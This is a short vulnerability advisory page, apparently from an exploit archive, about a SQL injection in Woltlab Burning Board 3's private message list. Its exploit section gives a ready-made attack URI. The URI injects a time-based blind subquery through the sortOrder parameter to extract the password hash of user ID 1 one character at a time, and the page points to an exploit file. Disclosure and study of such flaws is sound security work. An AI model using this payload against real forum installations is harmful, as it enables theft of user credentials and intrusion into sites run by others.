Woltlab Burning Board 'password' SQL Injection Vulnerability

info
discussion
exploit
solution
references

Woltlab Burning Board 'password' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI and exploit code is available:

http://www.example.com/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC, (SELECT password FROM wcf1_user WHERE userID=1 AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))

/data/vulnerabilities/exploits/27885.php